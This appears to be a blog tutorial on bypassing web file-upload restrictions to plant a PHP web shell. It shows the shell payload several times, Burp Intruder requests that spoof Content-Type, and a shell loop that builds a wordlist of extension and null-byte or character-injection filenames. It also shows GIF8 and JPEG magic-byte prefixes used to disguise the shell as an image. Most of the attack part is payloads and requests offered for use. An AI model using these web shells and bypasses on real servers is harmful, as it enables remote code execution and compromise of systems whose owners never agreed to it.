What is File Upload Vulnerability?
A file upload vulnerability refers to a security issue in a web application that allows an attacker to upload and execute malicious files.
It occurs when the application does not properly validate or restrict the files being uploaded, allowing the attacker to bypass intended security measures and potentially compromise the system.
There are many ways to bypass File Upload Restrictions based on what kind of defenses are in place. In this blog, I’ll show you one of the common and one of my favorite bypasses for File Upload Vulnerability.
Content-Type Restriction Bypass
1.Create a malicious .php file.
<?php echo system($_GET['cmd']); ?>2.Try to upload the file, and you will get a message saying "Extension Not Allowed" or something similar. 3. Using tools like Burp Suite, capture the Request and change the Content Type:
Content-Type: image/png
4. Now, in the above example, we used png, but you can change it based on the type of extension the application allows. For example, if it only allows JPG, then it will be:
Content-Type: image/jpgBypass 2:
If you do not know or found any working Content-Type, you can use payloads to fuzz for it as well:
1.Send the Request to Burp Intruder, highlight the value of Content-Type as our position:
Content-Type: §image/jpg§2. Use payloads from SecLists:
SecLists - content-type.txt3.Once the attack is done, try sorting by Length, Status Code, or Request/Response Response Times. Analyze the requests and find the Content-Type payload that worked.
Extension Bypass
1.Create a malicious .php file.
<?php echo system($_GET['cmd']); ?>2. Try to upload the file, and you get an error message saying you cannot upload .php file, even when you change the Content-Type. So in this case, we can fuzz for different types of extensions to bypass the restriction. Let’s start with a very simple one. Send the Request to Burp Intruder:
Content-Disposition: form-data; name="uploadFile"; filename="myFile§.php§"
"Content-Type: text/asp<?php system($_REQUEST['cmd']); ?>3. In our Intruder, we highlighted the extension for attack position, and now we are going to use publicly available payloads to fuzz for different extensions. Ex:
PayloadsAllTheThings - extensions.lst
4. Use the Payloads from Step 3 under your Payloads Tab and start the attack. Once the attack is done, try sorting by Length, Status Code, or Request/Response Times. Analyze the requests and find the extension that worked.
Bypass 2:
If the above payloads did not work for you, there is another way of bypassing the extension restrictions.
1. Let’s write a code where we are going to use “Character Injection”, where we are going to inject several characters before and after the final extension to cause the application to unknowingly upload our .php script:
for char in "%20" "%0a" "%00" "%0d0a" "/" ".\\" "." "…" ":"; do
for ext in ".php" ".phps" ".php3" ".pht" ".phar" ".phppt" ".pgif" ".phtml" ".phtm"; do
echo "myFile${char}${ext}.jpg" >> wordlist.txt
echo "myFile${ext}${char}.jpg" >> wordlist.txt
echo "myFile.jpg${char}${ext}" >> wordlist.txt
echo "myFile.jpg${ext}${char}" >> wordlist.txt
done
done 2. The code uses a nested loop to iterate over the characters (char) and extensions (ext.) provided in the original code. It appends the desired strings to the “wordlist.txt” file, following the same format as in the original code.
3. Just run the above code on your Terminal, and it will create a file called wordlist.txt with a bunch of payloads that we are going to use next.
4. Again, in the same scenario, we are trying to upload our malicious .php script, and we get a message saying “extension not allowed” or something similar. So, send the Request to Burp Intruder and highlight the whole file as our position for our attack:
Content-Disposition: form-data; name="uploadFile"; filename="§myFile.php§"
"Content-Type: text/asp
<?php system($_REQUEST['cmd']); ?>5. Once the attack is done, try sorting by Length, Status Code, or Request/Response Times. Analyze the requests and find the extension that worked.
Advanced level Bypass
Content Restriction & Extension Bypass:
1. Now let’s just say you tried to bypass the Content-Type and you tried to bypass the Extension, but you still get a message saying “Only Images are allowed” or something similar. That can mean the server is now checking the contents of our file as well. In that case, we can try to trick the server into thinking our file is an image file.
Content-Disposition: form-data; name="uploadFile"; filename="myFile.php"
Content-Type: image/gif
GIF8
<?php system($_REQUEST['cmd']); ?>2. In the above Request, we added “GIF8” trying to trick the server into thinking that our file is an image-type file, but in reality, it only starts with an image format, and then we have our malicious script after that.
3. Now, that will bypass the Content check restriction, and all we have to do is to bypass the extension restriction by fuzzing the filename with the wordlist.txt file we created earlier.
Magic Byte:
1. This time we cannot bypass the Content-Check restriction with “GIF8” because let’s just say the server only accepts jpg and png. In that case, we can take advantage of something called “Magic Byte”.
The term “Magic Byte” refers to the first few bytes of a file, which are used to identify and define the file type. It is also known as a “File Signature” or “Magic Number.” These bytes act as a unique identifier for different file formats.
Every file format has a specific sequence of bytes at the beginning that indicates its file type. These bytes are usually in a binary format and can be represented in hexadecimal notation. By examining the magic bytes, software applications or operating systems can determine the file format and handle it accordingly.
For example, in the case of a JPEG image file, the magic bytes are represented asFF D8 FF E0 00 10 4A 46 49 46 00 01.These bytes indicate that the file is a JPEG image. Similarly, other file formats have their own unique magic bytes.
Magic bytes are used by file parsers, operating systems, and software applications to verify the file type, ensure compatibility, and determine how to handle the file’s contents. They play a crucial role in identifying file formats correctly, even when file extensions or metadata may be altered or misleading.
By examining the magic bytes, software can determine if a file is an image, audio file, executable program, or any other supported format, allowing appropriate actions to be taken based on the file type.
2. As you can see in the above image, we used a tool called “xxd” to check the file in hex view, and the file we used is a .jpg file. The magic byte of a .jpg file is FF D8 FF E0 00 10 4A 46 49 46 00 01. This is true for any given .jpg file.
3. Now, we are going to create a .txt file with Magic Bytes for a .jpg file. It can be done with the following way:
4. We’ve created the file with.txt extension, but when checking the type of that file, we see it as a JPEG image type.
5. So now we can upload the above file because the content of that file will be seen as a .jpg file by the backend server. All we have to do is to add our malicious script to the file and fuzz for the extension with the wordlist.txt payload that we’ve created earlier.
Content-Disposition: form-data; name="uploadFile";
filename="§myFile.txt§"
Content-Type: image/jpg
ÿØÿà
<?php system($_REQUEST['cmd']); ?>
Leave a Reply